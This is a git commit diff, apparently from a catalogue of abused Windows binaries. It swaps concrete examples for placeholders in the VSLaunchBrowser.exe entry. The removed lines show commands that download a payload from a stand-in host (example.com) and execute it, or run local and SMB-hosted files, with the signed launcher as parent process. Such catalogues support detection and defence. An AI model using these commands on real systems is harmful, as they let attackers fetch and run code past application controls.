Generalising file paths and urls, see #10 (#422)

This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions

View File

@@ -4,7 +4,7 @@ Description: Microsoft Visual Studio browser launcher tool for web applications
Author: Avihay Eldad
Created: 2024-04-12
Commands:
- Command: VSLaunchBrowser.exe .exe http://example.com/payload
- Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
Description: Download and execute payload from remote server
Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Download
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Download: INetCache
- Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
- Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
Description: Execute payload via VSLaunchBrowser as parent process
Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
- Command: VSLaunchBrowser.exe .exe {PATH_SMB}
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Category: Execute